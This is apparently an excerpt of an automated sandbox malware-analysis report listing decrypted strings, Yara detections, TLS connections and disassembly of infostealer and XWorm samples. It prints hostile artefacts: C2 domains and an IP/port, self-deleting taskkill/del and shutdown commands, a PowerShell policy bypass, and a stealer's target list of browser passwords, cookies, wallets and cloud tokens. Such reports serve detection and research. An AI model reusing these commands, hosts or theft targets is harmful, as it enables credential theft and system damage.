Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000007.00000002.3393622094.0000000000E31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 127.0.0.1,95.216.115.242
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 33333
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.6
Source: 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: actiothreaz.com
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: importenptoc.com
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: voicesharped.com
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: inputrreparnt.com
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: torpdidebar.com
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: rebeldettern.com
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: garulouscuto.com
Source: 23.2.uniq.exe.400000.0.raw.unpack	String decryptor: breedertremnd.com

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 11_2_00419A00 CryptUnprotectData,		11_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1069932001\uniq.exe	Code function: 23_2_004198DF CryptUnprotectData,		23_2_004198DF

Phishing

Yara detected obfuscated html page

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\xdlUwi7w9.hta, type: DROPPED

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Source: random.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49780 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.6:50242 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49873 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.214.119:443 -> 192.168.2.6:49880 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:49912 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:49967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50001 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50047 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50090 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50094 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.139.208:443 -> 192.168.2.6:50104 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50190 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50196 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:50201 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50204 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:50220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50224 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50241 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:50244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50245 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.214.119:443 -> 192.168.2.6:50246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.6:50252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:50277 version: TLS 1.2

Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: System.Windows.Forms.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: Bedroom.pdbH^ source: L65uNi1.exe, 0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp, L65uNi1.exe, 0000000A.00000002.2528551112.0000000004109000.00000004.00000800.00020000.00000000.sdmp, uniq.exe0.7.dr, L65uNi1[1].exe.7.dr
Source:	Binary string: System.Windows.Forms.pdbh source: WER21C.tmp.dmp.14.dr
Source:	Binary string: vdr1.pdb source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdbRSDS source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: mscorlib.ni.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: System.pdb) source: WER21C.tmp.dmp.14.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbu\ source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: 1VB7gm8.exe, 00000008.00000003.2459365093.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Bedroom.pdb source: L65uNi1.exe, 0000000A.00000000.2488525794.0000000000BB2000.00000002.00000001.01000000.0000000A.sdmp, L65uNi1.exe, 0000000A.00000002.2528551112.0000000004109000.00000004.00000800.00020000.00000000.sdmp, uniq.exe0.7.dr, L65uNi1[1].exe.7.dr, WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: Bedroom.pdbMZ@ source: WER652B.tmp.dmp.36.dr
Source:	Binary string: System.ni.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr
Source:	Binary string: System.pdb source: WER21C.tmp.dmp.14.dr, WER652B.tmp.dmp.36.dr

Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1068542001\1VB7gm8.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov ebx, ecx	11_2_0040F060
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ch]	11_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov edx, ecx	11_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then push esi	11_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then jmp eax	11_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp word ptr [esi+eax], 0000h	11_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov eax, ebx	11_2_0040FB9E
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	11_2_0040F4DA
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov word ptr [edi], ax	11_2_0040FD7A
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov ecx, eax	11_2_00443EA7
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov word ptr [ecx], dx	11_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi+3D954FEDh]	11_2_0040CFD3
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov byte ptr [ebx], cl	11_2_00431800
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp byte ptr [edi+eax+01h], 00000000h	11_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov esi, eax	11_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	11_2_0043314D
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov word ptr [ebx], cx	11_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	11_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov ecx, eax	11_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+16h]	11_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	11_2_004019E0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then push eax	11_2_004431FF
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	11_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	11_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	11_2_00430A40
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	11_2_0043B250
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov byte ptr [edi], al	11_2_0041FA3E
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+759F8BA2h]	11_2_00444280
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	11_2_004330DC
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	11_2_00423340
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	11_2_00418B60
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 089E115Eh	11_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+0C61266Ch]	11_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov ecx, eax	11_2_0041F3C0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then push esi	11_2_0042B3D3
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+06h]	11_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov ecx, eax	11_2_0040DB91
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+2F3FA6E8h]	11_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C1F0655h	11_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov esi, ecx	11_2_0041BC47
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov esi, ecx	11_2_0041A733
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	11_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then jmp eax	11_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], E40A7173h	11_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov byte ptr [edx], bl	11_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov esi, ecx	11_2_0041BCF6
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-07h]	11_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov ecx, eax	11_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then mov esi, eax	11_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+02h]	11_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2C331E1Fh	11_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1068740001\L65uNi1.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1D78B1A5h]	11_2_0041FE58
